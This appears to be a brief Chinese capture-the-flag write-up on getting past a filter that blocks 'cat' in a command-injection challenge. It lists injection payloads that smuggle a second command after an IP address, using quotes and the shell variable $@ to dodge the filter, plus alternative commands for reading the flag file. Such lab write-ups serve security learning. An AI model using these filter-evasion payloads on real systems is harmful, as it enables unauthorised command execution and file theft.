过滤cat

查看当前目录

根据题目可以知道cat被过滤了，并不能简单的得到flag

使用单引号绕过 

127.0.0.1|c''at flag_1429188548629.php

使用双引号绕过 

127.0.0.1|c""at flag_1429188548629.php

利用Shell 特殊变量绕过

127.0.0.1|c$@at flag_1429188548629.php

查看页面源代码找flag

cat的代替

more:一页一页的显示档案内容 
less:与 more 类似 
head:查看头几行 
tac:从最后一行开始显示，可以看出 tac 是 cat 的反向显示 
tail:查看尾几行 
nl：显示的时候，顺便输出行号 
od:以二进制的方式读取档案内容 
vi:一种编辑器，这个也可以查看 
vim:一种编辑器，这个也可以查看 
sort:可以查看 
uniq:可以查看